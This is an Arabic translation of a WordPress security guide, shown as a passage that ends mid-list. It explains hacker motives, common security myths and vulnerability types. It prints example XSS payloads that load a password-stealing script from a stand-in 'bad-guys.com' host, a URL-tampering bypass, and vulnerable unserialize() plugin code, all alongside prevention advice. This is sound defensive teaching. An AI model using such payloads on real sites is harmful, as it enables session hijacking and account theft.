أمان WordPress: الدليل النهائي

يمكن أن يكون أمان WordPress مخيفًا ، لكن لا يجب أن يكون كذلك. في هذا الدليل الشامل لأمان WordPress ، قمنا بتبسيط أساسيات تأمين موقع WordPress الخاص بك حتى يتمكن أي شخص غير تقني من فهم موقع الويب الخاص به وحمايته من هجمات المتسللين.

تم تقسيم هذا الدليل لأمان WordPress إلى 10 أقسام سهلة الفهم. سيرشدك كل قسم إلى جانب معين من جوانب أمان WordPress. بنهاية الدليل ، ستتعرف على الأنواع المختلفة من نقاط الضعف ودوافع المتسللين وكيفية تأمين كل شيء من الخادم الخاص بك إلى المستخدمين الفرديين لموقع WordPress الخاص بك.

دعنا نتعمق!

القسم 1: هل WordPress آمن؟

هل WordPress آمن؟ الإجابة القصيرة هي نعم.

هل يحتوي WordPress على مشكلات أمنية؟

في حين أن WordPress نفسه آمن ، فإن تجنب أخطاء أمان WordPress يتطلب القليل من الجهد من مالكي المواقع. الحقيقة هي أن أكبر مشكلة أمان في WordPress هي مستخدميها. يمكن تجنب معظم عمليات اختراق WordPress على النظام الأساسي بجهد ضئيل من مالكي الموقع.

لا تقلق ، لقد قمنا بتغطيتك. سيعلمك هذا الدليل كل ما تحتاج لمعرفته حول الحفاظ على موقع الويب الخاص بك آمنًا.

قبل أن نتمكن من تأمين مواقعنا الإلكترونية ، يجب أن نفهم أولاً خمسة أشياء.

1. لماذا يهاجم المتسللون المواقع
2. الأنواع المختلفة لاختراق WordPress
3. أنواع محددة من نقاط الضعف في WordPress
4. كيفية منع الثغرات الأمنية في ووردبريس
5. كيفية تحديد مدى خطورة الثغرة الأمنية

لماذا يهاجم قراصنة موقع الويب الخاص بي؟

هذا سؤال أمان شائع في WordPress قد تطرحه عندما يبدأ أسوأ كابوس لك بالتحقق. لماذا يهاجم المخترق موقع الويب الخاص بي؟ كن مطمئنًا ، فإن فرص الهجوم على الصعيد الشخصي ضئيلة إن لم تكن على الإطلاق. لدى المتسللين دوافع أساسية لا علاقة لها بمحتوى موقع الويب الخاص بك. لا يهتم المتسللون عادةً بما إذا كان موقع الويب الخاص بك عبارة عن صفحة خيرية للجراء التي لا مأوى لها أو موقعًا به الكثير من السلع الرائعة للبيع.

ومع ذلك ، من الصعب ألا تشعر بأنك مستهدف عندما تتسلل هوية مجهولة الهوية إلى موقع الويب الخاص بك ، مما يتسبب في حدوث فوضى واضطراب. تشعر بالتوتر ، وكأن الموقف يخرج عن سيطرتك. تشعر بالهجوم شخصيًا وتتساءل عما إذا كانت هناك طريقة لمنع حدوث الهجوم. قد تتساءل حتى عما إذا كان هناك أي إنقاذ للحطام الذي كان موقع الويب الخاص بك.

إذن ، ما الذي يجعل المتسلل يستهدف موقعًا إلكترونيًا؟ لا علاقة له بموقع الويب الخاص بك ، أو ما هي الموضوعات التي يغطيها أو أي شيء من هذا القبيل. في الواقع ، يستهدف المتسللون البرامج التي يستخدمها موقع الويب الخاص بك للبقاء قيد التشغيل. من خلال اختراق هذا البرنامج ، يمكنهم سرقة بيانات العملاء الحساسة أو حتى التحكم في موقع WordPress الخاص بك.

لسوء الحظ ، مع تزايد شعبيته ، أصبح WordPress أيضًا هدفًا للمتسللين. إذا كان أحد مكونات WordPress الشائعة لديه ثغرة أمنية خطيرة ، فمن المحتمل أن يكون لدى المتسلل المخططات اللازمة للاستيلاء على مئات الآلاف ، إن لم يكن الملايين من مواقع الويب. لحسن الحظ ، يتم تصحيح معظم ثغرات المكونات الإضافية بسرعة بواسطة مطوريها.

من خلال القدرة على الحصول على معلومات حساسة وخاصة ، يمكن للقراصنة بيعها للحصول على دخل أو حتى الاحتفاظ بفدية البيانات ، مما يجعل الناس يدفعون بشكل أساسي لاستعادة معلوماتهم في أيد أمينة.

إذن ، ما هو الدافع الأساسي للمتسللين؟

لخلق التدفق النقدي لأنفسهم.

الإنترنت مكان مربح يوفر لجميع مناحي الحياة الفرصة لتوليد أجر معيشي. ومع ذلك ، هذا لا يعني أن الجميع يتعامل مع هذا بطريقة قانونية وأخلاقية. يحقق المتسللون أرباحًا عالية حتى من أصغر موقع ويب.

المال هو كل الحافز الذي يحتاجون إليه ، لكن البعض يستمتع بالشعور بالقوة التي يحصلون عليها عندما يخترقون موقعًا إلكترونيًا بنجاح ، لكن الغالبية العظمى منهم يعملون من أجل المال فقط.

القسم 2: تم الكشف عن أفضل 5 خرافات حول الأمان في WordPress

قبل أن ننتقل إلى بقية دليل أمان WordPress هذا ، دعنا نأخذ دقيقة لفضح بعض خرافات أمان WordPress.

ستجد الكثير من النصائح الأمنية في WordPress تطفو على الإنترنت من أشخاص ذوي نوايا حسنة يرغبون حقًا في المساعدة. لسوء الحظ ، فإن بعض هذه النصائح مبنية على أساطير أمان WordPress ولا تضيف في الواقع أي أمان إضافي إلى موقع WordPress الخاص بك. في الواقع ، قد تزيد بعض "نصائح" الأمان في WordPress من احتمالية مواجهتك للمشكلات والصراعات.

لدينا الكثير من خرافات أمان WordPress للاختيار من بينها ، لكننا سنركز فقط على الخمسة الأوائل التي رأيناها باستمرار في أكثر من 30000 بطاقة دعم. تم استخدام هذه المحادثات مع عملائنا كأساس للمعايير التالية لتحديد أهم خرافات أمان WordPress:

1. تكرار ذكر الأسطورة.
2. عدد الصداع الذي تسببت فيه الأسطورة.
3. الإحساس الزائف بالأمان الذي تمنحه الأسطورة.

1. يجب عليك إخفاء / wp-admin أو / wp-login URL (المعروف أيضًا باسم إخفاء الخلفية)

الفكرة وراء إخفاء wp-admin هي أن المتسللين لا يمكنهم اختراق ما لا يمكنهم العثور عليه. إذا لم يكن عنوان URL لتسجيل الدخول هو WordPress / wp-admin / URL القياسي ، ألست محميًا من هجمات القوة الغاشمة؟

الحقيقة هي أن معظم ميزات Hide Backend هي مجرد أمان من خلال الغموض ، وهي ليست استراتيجية أمان WordPress واقية من الرصاص. بينما يمكن أن يساعد إخفاء عنوان URL الخاص بخادم wp-admin في التخفيف من بعض الهجمات على تسجيل الدخول الخاص بك ، فإن هذا الأسلوب لن يوقفها جميعًا.

نتلقى في كثير من الأحيان تذاكر دعم من الأشخاص الذين يشعرون بالحيرة من كيفية قيام iThemes Security Pro بالإبلاغ عن محاولات تسجيل دخول غير صالحة عندما يكونون قد أخفوا تسجيل دخولهم. هذا بسبب وجود طرق أخرى لتسجيل الدخول إلى مواقع WordPress الخاصة بك إلى جانب استخدام متصفح ، مثل استخدام XML-RPC أو REST API. ناهيك عن أنه بعد تغيير عنوان URL لتسجيل الدخول ، لا يزال بإمكان مكون إضافي أو سمة أخرى الارتباط بعنوان URL الجديد.

في الواقع ، لا تغير ميزة إخفاء الخلفية أي شيء حقًا. نعم ، فهو يمنع معظم المستخدمين من الوصول مباشرة إلى عنوان URL الافتراضي لتسجيل الدخول. ولكن بعد قيام شخص ما بإدخال عنوان URL المخصص لتسجيل الدخول ، تتم إعادة توجيهه مرة أخرى إلى عنوان URL الافتراضي لتسجيل الدخول إلى WordPress.

من المعروف أيضًا أن تخصيص عنوان URL لتسجيل الدخول يتسبب في حدوث تعارضات. هناك بعض المكونات الإضافية أو السمات أو تطبيقات الجهات الخارجية التي تقوم بتشفير wp-login.php في قاعدة الرموز الخاصة بهم. لذلك عندما يبحث جزء من البرنامج الثابت عن yoursite.com/wp-login.php ، فإنه يعثر على خطأ بدلاً من ذلك.

2. يجب عليك إخفاء اسم الموضوع الخاص بك ورقم إصدار WordPress

إذا كنت تستخدم أدوات مطور المستعرض الخاص بك ، فيمكنك أن ترى بسرعة اسم الموضوع ورقم إصدار WordPress الذي يعمل على موقع WordPress. النظرية الكامنة وراء إخفاء اسم السمة وإصدار WP هي أنه إذا كان لدى المهاجمين هذه المعلومات ، فسيكون لديهم مخطط لاقتحام موقعك.

على سبيل المثال ، بالنظر إلى لقطة الشاشة أعلاه ، يمكنك أن ترى أن هذا الموقع يستخدم Twenty-One وإصدار WordPress 5.6.

تكمن المشكلة في أسطورة أمان WordPress هذه في عدم وجود شخص حقيقي خلف لوحة مفاتيح يبحث عن مزيج مثالي من السمة ورقم إصدار WordPress لمهاجمته. ومع ذلك ، هناك روبوتات طائشة تجوب الإنترنت بحثًا عن نقاط الضعف المعروفة في الكود الفعلي الذي يعمل على موقع الويب الخاص بك ، لذا فإن إخفاء اسم المظهر ورقم إصدار WP لن يحميك.

3. يجب إعادة تسمية دليل محتوى wp الخاص بك

يحتوي دليل wp-content على المكونات الإضافية والسمات ومجلد تحميل الوسائط. هذا عدد كبير من الأشياء الجيدة والتعليمات البرمجية القابلة للتنفيذ في دليل واحد ، لذلك من المفهوم أن الناس يريدون أن يكونوا استباقيين وآمنين لهذا المجلد.

لسوء الحظ ، من الأسطورة الأمنية في WordPress أن تغيير اسم محتوى wp سيضيف طبقة إضافية من الأمان إلى الموقع. لن تفعل ذلك. يمكننا بسهولة العثور على اسم دليل wp-content الذي تم تغييره باستخدام أدوات مطور المتصفح. في لقطة الشاشة أدناه ، يمكننا أن نرى أنني أعدت تسمية دليل المحتوى لهذا الموقع إلى / test /.

لن يؤدي تغيير اسم الدليل إلى إضافة أي أمان إلى موقعك ، ولكنه قد يتسبب في حدوث تعارضات مع المكونات الإضافية التي تحتوي على مسار دليل مشفر / wp-content /.

4. موقع الويب الخاص بي ليس كبيرًا بما يكفي لجذب انتباه المتسللين

تترك أسطورة أمان WordPress هذه الكثير من المواقع عرضة للهجوم. حتى إذا كنت مالك موقع صغير به حركة مرور منخفضة ، فلا يزال من الضروري أن تكون استباقيًا في تأمين موقع الويب الخاص بك.

حتى إذا كنت مالك موقع صغير به حركة مرور منخفضة ، فلا يزال من الضروري أن تكون استباقيًا في تأمين موقع الويب الخاص بك.

الحقيقة هي أن موقعك أو عملك لا يجب أن يكون كبيرًا لجذب انتباه المهاجم المحتمل. لا يزال المتسللون يرون فرصة لاستخدام موقعك كقناة لإعادة توجيه بعض زوارك إلى مواقع ضارة ، أو إرسال بريد عشوائي من خادم البريد الخاص بك ، أو نشر الفيروسات ، أو حتى لتعدين البيتكوين. سوف يأخذون أي شيء يمكنهم الحصول عليه.

5. يعد WordPress منصة غير آمنة

أكثر أسطورة أمان WordPress ضررًا هي أن WordPress نفسه غير آمن. هذا ببساطة غير صحيح. يعد WordPress أكثر أنظمة إدارة المحتوى شيوعًا في العالم ، ولم يحصل على هذا النحو من خلال عدم التعامل مع الأمان على محمل الجد.

القسم 3: نقاط ضعف WordPress و WordPress

4 أنواع من ووردبريس المأجورون

عندما يتعلق الأمر بفهم أمان WordPress ، فمن المهم أن نفهم

1. تحسين محركات البحث غير المرغوب فيها

الدافع الآخر للمتسلل لمهاجمة موقع الويب الخاص بك هو الحصول على فوائد تحسين محركات البحث غير المرغوب فيها. SEO ، أو تحسين محرك البحث ، هو ما تستخدمه محركات البحث لفهرسة موقع الويب الخاص بك أو ترتيبه. باستخدام كلمات رئيسية معينة ، موضوعة بشكل استراتيجي في صفحات الويب الخاصة بك ومنشورات المدونة ، يمكنك مساعدة موقع الويب الخاص بك على ترتيب أعلى في عمليات بحث Google. سيؤدي ذلك إلى زيادة حركة المرور إلى موقع الويب الخاص بك ويمكن أن يساعدك في تحقيق ربح يستحق وقتك.

يعرف المتسللون كل شيء عن مُحسّنات محرّكات البحث ويستخدمونها لمصلحتهم. عندما يتم اختراق موقع الويب الخاص بك ، سيقوم المتسللون بتثبيت باب خلفي في موقع الويب الخاص بك. هذا يسمح لهم بالتحكم في كلماتك الرئيسية ومحتوى موقع الويب عن بُعد. غالبًا ما يعيدون توجيه حركة المرور من موقع الويب الخاص بك ، ويحولونها مباشرة إلى موقعهم ، ويمررون إليها تمامًا.

سيؤدي هذا إلى ترك جمهورك المستهدف مرتبكًا ومحبطًا ، مما يؤدي إلى تدمير سمعة ومصداقية موقع الويب الخاص بك. غالبًا ما يتم إعادة توجيه زوار موقع الويب الخاص بك إلى مواقع من الواضح أنها خدع ، وسوف يترددون في إعادة زيارة موقع الويب الخاص بك في المستقبل.

كما لو أن هذا لم يكن سيئًا بما فيه الكفاية ، فإن المتسللين الذين يستخدمون هذا الأسلوب يجعلون موقع الويب الخاص بك يبدو سيئًا لمحركات البحث ، وليس فقط البشر. لن يبدو موقع الويب الخاص بك شرعيًا بعد الآن ، وسيهبط ترتيبه سريعًا. بدون ترتيب عالٍ في عمليات البحث ، سيصبح موقعك واحدًا من الملايين التي لا تحصل على أكثر من بضع مرات في الشهر.

2. حقن البرامج الضارة

يهاجم الكثير من المتسللين موقع الويب الخاص بك بهدف إصابته ببرامج ضارة. البرامج الضارة عبارة عن أجزاء صغيرة من التعليمات البرمجية يمكن استخدامها لإجراء تغييرات ضارة على موقع الويب الخاص بك. إذا أصيب موقعك ببرامج ضارة ، فمن المهم أن يتم تنبيهك في أسرع وقت ممكن.

في كل دقيقة تبقى فيها البرامج الضارة على موقع الويب الخاص بك ، فإنها تلحق المزيد من الضرر بموقعك. كلما زاد الضرر الذي لحق بموقعك على الويب ، كلما استغرق تنظيف موقع الويب الخاص بك واستعادته وقتًا أطول. من الضروري التحقق من صحة موقع الويب الخاص بك عن طريق الفحص المنتظم بحثًا عن البرامج الضارة. هذا هو السبب في أنه من الضروري التحقق باستمرار من صحة موقع الويب الخاص بك عن طريق المسح بحثًا عن البرامج الضارة.

3. انتزاع الفدية

قد يرغب المتسلل في مهاجمة موقع الويب الخاص بك لحجزه للحصول على فدية. يشير Ransomware إلى عندما يستولي أحد المتطفلين على موقع الويب الخاص بك ولن يقوم بإعادته إليك إلا إذا دفعت رسومًا باهظة لهم. متوسط ​​وقت تعطل هجوم رانسوم وير هو 9.5 أيام. ما مقدار الإيرادات التي ستكلفك 10 أيام من عدم وجود مبيعات؟

ارتفع متوسط ​​الفدية التي يطلبها المتسللون بشكل كبير ، من 294 دولارًا في عام 2015 إلى أكثر من 13000 دولار في عام 2020. مع هذه الأنواع من المدفوعات ، لا تتباطأ أعمال الجريمة عبر الإنترنت. لقد أصبح من المهم أكثر فأكثر تأمين وحماية موقع الويب الخاص بك بشكل صحيح مع نمو مجتمعات الجريمة مثل هذه.

4. تشويه الموقع

قد يهاجم بعض المتسللين موقع الويب الخاص بك للحصول على القليل من المرح. أسلوب القرصنة الأقل شرًا هو أسلوب التشويش على مواقع الويب. هؤلاء هم عادةً أطفال أو شباب بدأوا للتو في اللعب بمهارات القرصنة الخاصة بهم. يقومون بهذه الاختراقات كطريقة لممارسة مهاراتهم وتحسينها.

عندما نتحدث عن تشويه موقع ويب ، فكر في الكتابة على الجدران. سيغير المهاجمون مظهر موقع الويب الخاص بك تمامًا ، أحيانًا بطرق مرحة أو أحمق. يقوم معرّفو مواقع الويب النموذجيون بأعمالهم من أجل المتعة أو كوسيلة للتباهي. غالبًا ما ينشرون صورًا لأفعالهم السيئة ، في محاولة منهم للتغلب على بعضهم البعض للفوز بجائزة أفضل تشويه.

الخبر السار هو أن تجربة هذا النوع من القرصنة أقل خطورة بالنسبة لك. بالإضافة إلى ذلك ، نظرًا لأن معظمهم من المراهقين وغيرهم من المتسللين الهواة يقومون بعمليات التشويه ، فمن السهل اكتشافهم وإزالتهم من موقع الويب الخاص بك مقارنةً بأشكال البرامج الضارة الأخرى. يمكن عادةً اكتشافها بواسطة الماسحات الضوئية وإزالتها بسرعة.

شرح 21 نقاط ضعف ووردبريس الشائعة

لسوء الحظ ، توجد ثغرات أمنية في WordPress. يمكن أن توجد ثغرات أمنية في WordPress في المكونات الإضافية والسمات الخاصة بك وحتى WordPress الأساسية. ونظرًا لأن WordPress يشغل الآن ما يقرب من 40 ٪ من جميع مواقع الويب ، فإن مهمة فهم نقاط الضعف أكثر أهمية. ببساطة: عليك أن تكون يقظًا بشأن أمان موقع الويب الخاص بك.

إذا لم تكن خبيرًا في أمان WordPress ، فقد يكون فهم جميع نقاط الضعف المختلفة في WordPress أمرًا شاقًا. قد يكون من الصعب أيضًا محاولة فهم المستويات المختلفة لشدة الثغرة ، جنبًا إلى جنب مع مخاطر ثغرة WordPress.

سيحدد هذا الدليل 21 نقطة ضعف شائعة في WordPress ، ويغطي كيفية تسجيل مدى خطورة ثغرة WordPress ، ويعطي أمثلة عن كيفية استغلال المتسلل للثغرة الأمنية ، ويوضح كيف يمكن منع هذه الثغرات. دعنا نتعمق.

ما هي ثغرة WordPress؟

الثغرة الأمنية في WordPress هي نقطة ضعف أو عيب في قالب أو مكون إضافي أو نواة WordPress يمكن للمتطفلين استغلالها. بعبارة أخرى ، تُنشئ الثغرات الأمنية في WordPress نقطة دخول يمكن للمتسلل استخدامها للتخلص من أي نشاط ضار.

ضع في اعتبارك أن القرصنة على مواقع الويب تكون آلية بالكامل تقريبًا. لهذا السبب ، يمكن للمتسللين بسهولة اقتحام عدد كبير من مواقع الويب في أي وقت من الأوقات على الإطلاق. يستخدم المتسللون أدوات خاصة تفحص الإنترنت بحثًا عن نقاط الضعف المعروفة.

يحب المتسللون الأهداف السهلة ، وامتلاك موقع ويب يقوم بتشغيل برنامج به نقاط ضعف معروفة يشبه تسليم المتسلل التعليمات خطوة بخطوة لاقتحام موقع WordPress أو الخادم أو الكمبيوتر أو أي جهاز آخر متصل بالإنترنت.

تغطي تقاريرنا الشهرية حول الثغرات الأمنية في WordPress جميع نواة WordPress التي تم الكشف عنها علنًا ومكوِّن WordPress الإضافي وثغرات الثغرات الأمنية. في هذه التقارير ، نشارك اسم المكون الإضافي أو السمة الضعيفة والإصدارات المتأثرة ونوع الثغرة الأمنية.

ما هي ثغرة يوم الصفر؟

عندما يتعلق الأمر بأمان WordPress ، من المهم فهم تعريف ثغرة يوم الصفر. نظرًا لأنه تم الكشف عن الثغرة الأمنية للجمهور ، فإن المطور لديه صفر أيام لتصحيح الثغرة الأمنية. ويمكن أن يكون لهذا آثار كبيرة على الإضافات والقوالب الخاصة بك.

عادةً ما يكتشف الباحث الأمني ​​ثغرة أمنية ويكشف بشكل خاص عن الثغرة الأمنية لمطوري الشركة الذين يمتلكون البرنامج. يتفق الباحث الأمني ​​والمطور على أنه سيتم نشر التفاصيل الكاملة بمجرد إتاحة التصحيح. قد يكون هناك تأخير طفيف في الكشف عن الثغرة الأمنية بعد إصدار التصحيح لمنح المزيد من الأشخاص الوقت لتحديث الثغرات الأمنية الرئيسية.

ومع ذلك ، إذا لم يستجب المطور للباحث الأمني ​​أو فشل في توفير تصحيح للثغرة الأمنية ، فقد يكشف الباحث علنًا عن الثغرة الأمنية للضغط على المطور لإصدار تصحيح.

قد يبدو الكشف علنًا عن ثغرة أمنية وتقديم يوم الصفر على ما يبدو بنتائج عكسية. لكنها الرافعة الوحيدة التي يجب على الباحث الضغط عليها للضغط على المطور لإصلاح الثغرة الأمنية.

يحتوي Project Zero من Google على إرشادات مماثلة عندما يتعلق الأمر بالكشف عن نقاط الضعف. ينشرون التفاصيل الكاملة للثغرة الأمنية بعد 90 يومًا. ما إذا كان قد تم تصحيح الثغرة الأمنية أم لا.

الضعف موجود ليجده أي شخص. إذا اكتشف المتسلل الثغرة الأمنية قبل أن يقوم المطور بإصدار التصحيح ، فإنه يصبح أسوأ كابوس للمستخدم النهائي .... يوم الصفر المستغل بنشاط.

ما هي ثغرة يوم الصفر المستغلة بشكل نشط؟

ثغرة يوم الصفر المستغلة بشكل نشط هي بالضبط ما تبدو عليه. إنها ثغرة أمنية غير مصححة يستهدفها المتسللون ويهاجمونها ويستغلونها بنشاط.

في نهاية عام 2018 ، كان المتسللون يستغلون بنشاط ثغرة خطيرة في WordPress في المكون الإضافي WP GDPR Compliance. سمح الاستغلال للمستخدمين غير المصرح لهم - المزيد حول هذا في القسم التالي - بتعديل إعدادات تسجيل مستخدم WP وتغيير دور المستخدم الافتراضي الجديد من مشترك إلى مسؤول.

وجد هؤلاء المتسللون هذه الثغرة الأمنية قبل المكوّن الإضافي WP GDPR Compliance والباحثين الأمنيين. لذلك ، كان أي موقع ويب تم تثبيت المكون الإضافي عليه علامة سهلة ومضمونة لمجرمي الإنترنت.

كيف تحمي نفسك من ضعف يوم الصفر

أفضل طريقة لحماية موقع الويب الخاص بك من ثغرة Zero-Day هي إلغاء تنشيط البرنامج وإزالته حتى يتم تصحيح الثغرة الأمنية. لحسن الحظ ، تصرف مطورو البرنامج الإضافي WP GDPR Compliance بسرعة وأصدروا تصحيحًا للثغرة الأمنية في اليوم التالي للإفصاح عنها للجمهور.

تجعل الثغرات الأمنية التي لم يتم إصلاحها موقع الويب الخاص بك هدفًا سهلاً للمتسللين.

مقابل الثغرات الأمنية المصادق عليها في WordPress

هناك نوعان من المصطلحات التي يجب أن تكون على دراية بها عند الحديث عن نقاط ضعف WordPress.

1. غير مصادق - تعني ثغرة WordPress غير المصادق عليها أنه يمكن لأي شخص استغلال الثغرة الأمنية.
2. مصادق - وهو موثق وورد وسائل الضعف فإنه يتطلب المستخدم تسجيل الدخول لاستغلالها.

الثغرة الأمنية التي تتطلب مستخدمًا مصادقًا هي أصعب كثيرًا على المخترق لاستغلالها ، خاصةً إذا كانت تتطلب امتيازات على مستوى المسؤول. وإذا كان المتسلل لديه بالفعل مجموعة من بيانات اعتماد المسؤول ، فلن يحتاج حقًا إلى استغلال ثغرة أمنية لإحداث الفوضى.

هناك تحذير واحد. تتطلب بعض الثغرات الأمنية المصادق عليها فقط قدرات على مستوى المشترك لاستغلالها. إذا كان موقع الويب الخاص بك يسمح لأي شخص بالتسجيل ، فلا يوجد فرق كبير بين هذا والثغرة الأمنية غير المصادق عليها.

عندما يتعلق الأمر بنقاط الضعف في WordPress ، فهناك 21 نوعًا شائعًا من الثغرات الأمنية. دعنا نغطي كل نوع من أنواع الثغرات الأمنية في WordPress.

1. تجاوز المصادقة

تسمح الثغرة الأمنية في تجاوز المصادقة للمهاجم بتخطي متطلبات المصادقة وأداء المهام المحجوزة عادة للمستخدمين المصادق عليهم.

المصادقة هي عملية التحقق من هوية المستخدم. يتطلب WordPress من المستخدمين إدخال اسم مستخدم وكلمة مرور للتحقق من هويتهم.

مثال على تجاوز المصادقة

تتحقق التطبيقات من المصادقة بناءً على مجموعة ثابتة من المعلمات. يمكن للمهاجم تعديل هذه المعلمات للوصول إلى صفحات الويب التي تتطلب عادةً المصادقة.

من الأمثلة الأساسية لشيء كهذا معلمة مصادقة في عنوان URL.

 https:/my-website/some-plugint?param=authenticated&param=no

يحتوي عنوان URL أعلاه على معلمة مصادقة بقيمة لا. لذلك عندما نزور هذه الصفحة ، ستظهر لنا رسالة تخبرنا بأننا غير مخولين لعرض المعلومات على هذه الصفحة.

ومع ذلك ، إذا كان فحص المصادقة مشفرًا بشكل سيئ ، يمكن للمهاجم تعديل معلمة المصادقة للوصول إلى الصفحة الخاصة.

 https:/my-website/some-plugint?param=authenticated&param=yes

في هذا المثال ، يمكن للمخترق تغيير قيمة المصادقة في عنوان URL إلى نعم لتجاوز متطلبات المصادقة لعرض الصفحة.

كيفية منع تجاوز المصادقة

يمكنك المساعدة في حماية موقع الويب الخاص بك من ثغرات المصادقة المعطلة باستخدام المصادقة ذات العاملين.

2. ضعف الباب الخلفي

تسمح ثغرة Backdoor لكل من المستخدمين المصرح لهم وغير المصرح لهم بتجاوز إجراءات أمان WordPress العادية والحصول على وصول عالي المستوى إلى جهاز كمبيوتر أو خادم أو موقع ويب أو تطبيق.

مثال مستتر

ينشئ المطور بابًا خلفيًا حتى يتمكنوا من التبديل بسرعة بين الترميز واختبار الكود كمستخدم مسؤول. لسوء الحظ ، ينسى المطور إزالة الباب الخلفي قبل طرح البرنامج للجمهور.

إذا وجد المتسلل الباب الخلفي ، فيمكنه استغلال نقطة الدخول للحصول على وصول المسؤول إلى البرنامج. الآن بعد أن أصبح للمتسلل حق الوصول الإداري ، يمكنه القيام بجميع أنواع الأشياء الضارة مثل حقن برامج ضارة أو سرقة بيانات حساسة.

كيفية منع الباب الخلفي

يمكن اختزال الكثير من الأبواب الخلفية في مشكلة واحدة ، وهي التهيئة الأمنية الخاطئة. يمكن التخفيف من مشكلات التكوين الخاطئ لأمان WordPress عن طريق إزالة أي ميزات غير مستخدمة في الكود ، والحفاظ على تحديث جميع المكتبات ، وجعل رسائل الخطأ أكثر عمومية.

3. PHP Object-Injection قابلية التأثر

تحدث ثغرة PHP Object-Injection مع قيام المستخدم بإرسال إدخال غير معقم (بمعنى عدم إزالة الأحرف غير القانونية) قبل تمريرها إلى وظيفة PHP غير unserialized() .

مثال حقن كائن PHP

فيما يلي مثال واقعي لثغرة PHP Object-Injection في المكون الإضافي Sample Ads Manager WordPress الذي تم الإبلاغ عنه في الأصل بواسطة sumofpwn.

ترجع المشكلة إلى مكالمتين غير آمنتين لإلغاء تسلسل () في ملف الملحقات sam-ajax-loader.php . يتم أخذ الإدخال مباشرة من طلب POST كما هو موضح في الكود أدناه.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

قد تؤدي هذه المشكلة إلى قيام المهاجم بإدخال تعليمات برمجية ضارة وتنفيذها.

كيفية منع حقن كائن PHP

لا تستخدم وظيفة unserialize() مع المدخلات التي يوفرها المستخدم ، واستخدم وظائف JSON بدلاً من ذلك.

4. ثغرة أمنية في البرمجة النصية عبر المواقع

تحدث ثغرة أمنية في XSS أو Cross-Site Scripting عندما يسمح تطبيق ويب للمستخدمين بإضافة تعليمات برمجية مخصصة في مسار URL. يمكن للمهاجم استغلال الثغرة الأمنية لتشغيل تعليمات برمجية ضارة في متصفح الويب الخاص بالضحية ، أو إنشاء إعادة توجيه إلى موقع ويب ضار ، أو خطف جلسة مستخدم.

هناك ثلاثة أنواع رئيسية من XSS ، تنعكس. المخزنة ، والمستندة إلى DOM

5. انعكاس ضعف البرمجة النصية عبر المواقع

تحدث XSS المنعكسة أو البرمجة النصية عبر المواقع المنعكسة عندما يتم إرسال برنامج نصي ضار في طلب العميل - وهو طلب قدمته في المستعرض - إلى خادم وينعكس مرة أخرى بواسطة الخادم ويتم تنفيذه بواسطة المستعرض الخاص بك.

مثال على البرمجة النصية عبر المواقع المنعكسة

لنفترض أن yourfavesite.com يتطلب منك تسجيل الدخول لعرض بعض محتويات موقع الويب. ودعنا نقول أن موقع الويب هذا فشل في ترميز مدخلات المستخدم بشكل صحيح.

يمكن للمهاجم الاستفادة من هذه الثغرة الأمنية عن طريق إنشاء رابط ضار yourfavesite.com مع مستخدمي yourfavesite.com في رسائل البريد الإلكتروني yourfavesite.com الوسائط الاجتماعية.

يستخدم المهاجم أداة تقصير عناوين URL لجعل الرابط الخبيث يبدو غير مهدد yourfavesite.com/cool-stuff للنقر عليه ، yourfavesite.com/cool-stuff . ولكن ، عند النقر فوق الارتباط المختصر ، يتم تنفيذ الارتباط الكامل بواسطة متصفحك yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

بعد النقر على الرابط، سوف يتم نقلك إلى yourfavesite.com ، وسوف تنعكس السيناريو الخبيثة إلى المتصفح الخاص بك، مما يسمح للمهاجم اختطاف الكوكيز جلسة العمل الخاصة بك و yourfavesite.com حساب.

كيفية منع انعكاس البرمجة عبر المواقع

القاعدة رقم 5 في ورقة الغش الخاصة بمنع البرمجة النصية عبر OWASP هي تشفير عنوان URL قبل إدخال بيانات غير موثوق بها في قيم معلمات عنوان URL لـ HTML. يمكن أن تساعد هذه القاعدة في منع إنشاء ثغرة XSS انعكاسية عند إضافة بيانات غير موثوق بها إلى قيمة معلمة HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. ثغرة أمنية في البرمجة النصية عبر المواقع المخزنة

تسمح ثغرة XSS المخزنة أو البرمجة النصية عبر المواقع المخزنة للمتسللين بحقن تعليمات برمجية ضارة وتخزينها على خادم تطبيق الويب.

مثال على البرمجة النصية عبر المواقع المخزنة

يكتشف المهاجم أن yourfavesite.com يسمح للزائرين بتضمين علامات HTML في قسم التعليقات بالموقع. لذلك ينشئ المهاجم تعليقًا جديدًا:

مقال رائع! تحقق من هذه المقالة الرائعة الأخرى <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

ملاحظة: قد تتطلب ثغرة XSS المنعكسة من الزائر النقر فوق ارتباط التعليمات البرمجية الضارة لتنفيذه. يتطلب هجوم XSS المخزن زيارة الصفحة التي تحتوي على التعليق فقط. تعمل الشفرة الخبيثة مع كل تحميل للصفحة.

الآن بعد أن أضاف الشخص السيئ التعليق ، سيتعرض كل زائر مستقبلي لهذه الصفحة لنصه الضار. يتم استضافة البرنامج النصي على موقع الويب الخاص yourfavesite.com سيء ولديه القدرة على اختطاف ملفات تعريف ارتباط جلسة الزوار وحسابات yourfavesite.com .

كيفية منع البرمجة النصية عبر المواقع المخزنة

القاعدة رقم 1 في ورقة الغش الخاصة بمنع البرمجة النصية عبر OWASP هي ترميز HTML قبل إضافة بيانات غير موثوق بها إلى عناصر HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

ترميز الأحرف التالية لمنع التبديل إلى أي سياق تنفيذ ، مثل البرنامج النصي أو النمط أو معالجات الأحداث. يوصى باستخدام كيانات سداسية عشرية في المواصفات.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. توثيق ثغرة أمنية في البرمجة النصية عبر المواقع المستندة إلى نموذج كائن

